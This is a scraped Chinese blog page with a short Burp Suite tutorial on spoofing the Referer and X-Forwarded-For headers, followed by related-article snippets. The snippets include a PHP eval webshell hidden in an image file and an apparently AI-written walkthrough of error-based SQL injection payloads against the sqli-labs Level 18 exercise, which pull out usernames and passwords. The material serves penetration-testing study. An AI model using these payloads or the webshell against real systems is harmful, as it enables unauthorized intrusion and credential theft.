burpsuit学习--修改来源地址

最新推荐文章于 2025-06-11 10:07:24 发布
最新推荐文章于 2025-06-11 10:07:24 发布
阅读量7.8k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zcc1414/article/details/12449291
本文介绍如何使用Burpsuit安装与配置Java环境,设置代理以监视网络流量,通过代理发送请求并修改请求头信息,实现对特定网站来源的请求模拟与上传文件的16进制修改。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

安装Burpsuit:

安装JAVA  环境   JDK

命令: Java –jar burpsuite_v1.4.jar   创建批处理 运行就行了

proxy -> options  设置代理     --------------     IE  上设置代理   -》连接-》局域网


这里就可以监视了


Proxy  ->  History  ->  看到有一条拦截

右击  -》  send to repeater   送到服务器

修改来源      -》GO

Accept: */*
Referer:http://xdsec.org          就可以来自  这个网站的来源去访问了
Accept-Language: zh-cn   


在这里还可以同样方法去去修改      上传文件




16进制修改······································································


修改 转到地址      A -》 目的

设置A地址

HTTP-X-Forwarded-For:212.77.1.243


设置转发 地址  为   HOSTS 修改


Burpsuite插件 -- 伪造IP
KHOST的博客
08-05 4656
今天给大家介绍一款Burpsuite插件,burpFakeIP 一、下载地址 https://github.com/TheKingOfDuck/burpFakeIP 二、安装插件 1、解压到本地 2、打开burpsuite,选择Extender,Add 3、选择下载好python插件,选择下一步 4、安装成功 三、使用方法 1、伪造指定ip,右击抓到的数据包,选择fakeip,inputIP,输入想要用的ip地址,点击确定,自动添加 2、伪造本地...
2021/11/6-burpsuit抓包、网页源代码修改
m0_54628962的博客
11-06 4096
2021/11/6攻防世界 WEB 1.cookie 打开网页 利用burpsuit抓包 第八行:cookie:look-here=cookie.php 则在网页IP后添加url后缀名cookie.php再次刷新页面并抓包 得到此界面,在burpsuit,HTTP响应中得到flag 2.disabled_button 打开网页 得到一个不能按的按钮 Ctrl-u打开网页源代码,发现其存在disabled属性(可设置让按钮不能按动),修改网页源代码删除disabled属性 修改网页源代码方法: 另存为网
BurpSuite教程——渗透测试第一关:BP工具使用
最新发布
wly55690的博客
06-11 933
BurpSuite的核心功能是Proxy——“代理”。代理模块主要用于拦截浏览器的http会话内容,给其他模块功能提供数据。Proxy向下又分为四个部分:Intercept、HTTP history、Websockets history、options。
BurpSuite超好用的伪装IP
互联网环境恶劣,现在积极的想从事网络安全行业
11-16 1709
当我们做安全渗透的时候,很容易被封IP;IP被封了,影响我们项目的进度,如果准备不够充分,那么就可能导致后果就是很失败了;听朋友说网上有软件可以完成伪装IP,小编怀着激动的心,颤抖的手,上手搜索操作,可惜还是无法成功;但经过泷羽Sec的课点拨,发现了BP中的一个插件可以伪装IP进行请求;现在小编把完整的操作步骤一一描述,以便大家获取。
小迪渗透笔记:文件上传(2)
qq_52696970的博客
04-02 2134
文件上传(2)1、后端绕过(1)图片马的制作(2)文件头检测(3)图像文件信息判断(4)逻辑安全(5)目录命名+数组接收(6)CVE漏洞2、解析漏洞3、编辑器漏洞4、文件上传思路 1、后端绕过 代码问题漏洞 (1)图片马的制作 copy 1.png /b + shell.php /a webshell.jpg 直接在图片中插入(十六进制)webshell:<?php @eval($_POST['x']);?> (2)文件头检测 一般用十六进制器修改burpsuit抓包修改头文件) JPEG (
burpsuit学习笔记
qq_38348692的博客
07-19 759
burpsuit学习笔记 burpsuit intruder 暴力破解: (1).payload type a. simple list:简单列表最简单的Payload类型,通过配置一个字符串列表作为Payload,也可以手工添加字符串列表或从文件加载字符串列表 b. runtime file:运行时文件 ——指定文件,作为相对应Payload位置上的Payload列表Burp Intruder...
Server-side template injection (SSTI)学习笔记
汗的博客
05-03 1769
文章目录阅读文档了解基本模板语法Lab: Basic server-side template injectionLab: Basic server-side template injection (code context)了解安全隐患寻找已知漏洞探索开发人员提供的对象创建自定义攻击 阅读文档 文档是最有用的信息来源,例如,一旦您知道正在使用基于Python的Mako模板引擎,实现远程代码执行就...
【春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2760
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
CSRF(Cross-site request forgery)
fencecat的博客
07-20 987
CSRF是一个web安全漏洞,该漏洞通过引诱用户来执行非预期的操作。该漏洞使得攻击者能够绕过同源策略,同源策略是一种用来阻止不同网站相互干扰的一种技术。 CSR跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在CSRF攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行点击,用户一旦点击,整个攻击也就完成了。所以CSRF攻击也被称为”one click"攻击。
Webug3.0 初级攻略 1-16关
rm -rf /*
02-27 2926
虚拟机下载路径: 链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg  提取码:7jfs  第一关:很简单的一个注入   使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试 1.提交 ' 报错,可能存在注入点   还是一个字符型的注入漏洞 测试语句:http://172.27.73.13/pentes...
BurpSuite使用——HTTP
LiBai'S BLOG
05-17 7135
背景介绍 从微信6.0开始,其内嵌的浏览器在User Agent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,增加之后真的安全吗? User-Agent(用户代理)字符串是Web浏览器用于声明自身型号版本并随HTTP请求发送给Web服务器的字符串,在Web服务器上可以获取到该字符串。 实训目标 1、User-Agent的理解 2、微信浏览器内嵌新增取值内容 3、使用BurpSuite工具修改内容 解题方向 根据页面提示,抓包分析除了判断浏览器类型还判断了微信特有的NetType
burpsuite 设置https_强化 web 攻击神器 Burp Suite (二) — 切换ip技能点
weixin_36362920的博客
01-02 670
1前言上篇文章(强化 web 攻击神器 Burp Suite (一) — 验证码识别技能点)给 Burp Suite 添加验证码识别技能点,对于现代化的渗透测试神器来说,自动化切换 ip 也是必备技能,本文通过动态设置 HTTP 代理来完善此功能。2快速开发2.1 原理分析对于 HTTP 代理,HTTP 客户端向代理发送请求报文,代理服务器需要正确地处理请求和连接...
使用burpsuite伪造数据包数据
m0_60121089的博客
09-19 4159
代理设置:本地环回地址(如:127.0.0.1)和端口(8080),浏览器请求的数据包就会先发送到127.0.0.1:8080上,然后在转发给服务端。使用bp在127.0.0.1:8080上监听,开启拦截功能,就会抓到请求的数据包,点击forward才将数据包转发给服务端。根据题目要求,使用bp抓取关键数据包,更改数据包的数据,再转发出去,达到伪造的效果。搜索引擎可以辅助解题。
神器burpsuite专题
ZY95001的博客
08-26 517
一、安装 1.安装Java环境:jdk 2.安装burpsuite软件包 二、设置代理 浏览器端:谷歌浏览器:设置---代理---手动设置代理 IP:127.0.0.1 端口:8080 软件端:burpsuite默认:IP:127.0.0.1 端口:8080 两者设置相同后,经过浏览器的数据等同于经过了BP,因此可以实现抓包。 三、抓包 抓取https包(加密)。 1.先导出证书。 2. 3. ...
burpsuite爆破3个变量_开源项目 | BurpSuite插件:burpFakeIP burpsuite伪造ip,我是认真的。...
weixin_39738273的博客
11-28 871
项目介绍“burpsuite伪造ip,我是认真的。”在GitHub的项目地址中下载并导入到Burp安装(原文链接Github传送门):本插件共有四个小功能伪造指定ip伪造本地ip伪造随机ip随机ip爆破0x01 伪造指定ip在Repeater模块右键选择fakeIp菜单,然后点击inputIP功能,然后输入指定的ip:程序会自动添加所有可伪造得字段到请求头中。0x02 伪造本地ip在Re...
burpsuite 实战指南
whatday的专栏
04-19 6441
第一章 Burp Suite 安装和环境配置 Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中,我们使用Burp Suite将使得测试工作变得更加容易和方便,即使在不需要娴熟的技巧的情况下,只有我们熟悉Burp Suite的使用,也使得渗透测试工作变得轻松和高效。 Burp Suite是由Ja...
burpburpsuite基础(八)
m0_53419560的博客
12-08 763
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
怎么用burpsuit爆sqli-lab18的数据
03-22
<think>嗯,用户想用Burp Suite攻破sqli-lab的第18关。首先,我需要回忆一下sqli-lab各个关卡的特点。第18关可能涉及到POST请求的注入,或者是需要处理HTTP头部的注入,比如User-Agent、Referer或Cookie之类的。因为在之前的关卡中,用户可能已经遇到过基于GET和POST的注入,而更高级的关卡可能会引入更复杂的场景。 用户提到的是第18关,根据我的记忆,sqli-lab的第18关是一个基于User-Agent的注入,并且可能需要通过报错注入来获取信息。这时候,常规的联合查询注入可能不可行,因为页面没有明显的回显位置。因此,需要利用报错注入技术,比如使用updatexml()或extractvalue()函数来触发错误信息,从而泄露数据。 接下来,使用Burp Suite的步骤大致如下:首先拦截登录请求,因为很多关卡需要先登录。然后,在请求中寻找可能的注入点,比如User-Agent头部。修改User-Agent的值,插入恶意SQL代码,观察服务器的响应是否有报错信息。如果报错信息中包含数据库内容,说明注入成功。 需要注意的点包括正确构造报错注入的payload,例如使用updatexml()函数时,需要确保XPath格式正确,并且通过concat函数将查询结果插入到报错信息中。同时,可能需要处理字符串长度限制的问题,使用substring或limit来分批次提取数据。 此外,用户可能需要了解如何配置Burp Suite的代理,设置浏览器通过Burp发送请求,以便拦截和修改HTTP流量。还有,处理可能存在的WAF或过滤机制,比如某些特殊字符被转义或过滤,这时候需要尝试绕过方法,比如使用双重编码或注释符。 另外,参考用户提供的引用内容,提到了无回显时的报错或盲注。所以在第18关中,如果确实没有回显,可能需要确认是否属于报错注入场景,或者是否需要结合时间盲注。但根据常见的攻略,第18关通常是报错注入,所以重点放在报错技术上。 最后,确保步骤详细,用户能够一步步跟随操作,包括如何修改请求、如何构造payload、如何解析返回的错误信息以提取数据。同时,提醒用户注意合法性和授权测试,避免进行未经许可的渗透测试。</think>### 使用Burp Suite攻破sqli-lab Level 18的步骤与技巧 #### 1. 环境准备与请求分析 - **配置Burp Suite代理**:设置浏览器通过Burp Suite发送请求(默认端口`8080`),确保能拦截HTTP流量 - **观察页面特性**:Level 18为HTTP头注入场景,注入点位于`User-Agent`头部[^1]。通过提交表单后触发后端SQL操作 #### 2. 注入点验证 ```http POST /sqli-labs/Less-18/ HTTP/1.1 User-Agent: ' or updatexml(1,concat(0x7e,version()),0) or ' ``` 若返回包含`XPATH syntax error`的报错信息,则确认存在报错注入漏洞,示例错误提示: $${\rm ERROR: ~5.7.26-0ubuntu0.18.04.1}$$ #### 3. 分步数据提取 **(1) 获取数据库名** ```http User-Agent: ' or updatexml(1,concat(0x7e,database()),0) or ' ``` 报错返回: $${\rm ERROR: ~security}$$ **(2) 获取表名** ```http User-Agent: ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) or ' ``` 通过修改`limit`参数遍历所有表(需处理报错信息长度限制) **(3) 提取字段值** ```http User-Agent: ' or updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1)),0) or ' ``` 返回错误信息将包含类似: $${\rm ERROR: ~Dumb:I-kill-you}$$ #### 4. 绕过限制技巧 - **字符串截断**:使用`substr()`分段获取长数据 ```http User-Agent: ' or updatexml(1,concat(0x7e,substr((select password from users limit 0,1),1,10)),0) or ' ``` - **HEX编码绕过**:对特殊字符进行编码处理 - **注释符使用**:`--+`或`#`消除语句尾部干扰 #### 5. 自动化辅助 使用Burp Suite的**Intruder**模块: 1. 标记注入位置为`§payload§` 2. 加载包含报错注入语句的字典 3. 通过错误响应筛选有效结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值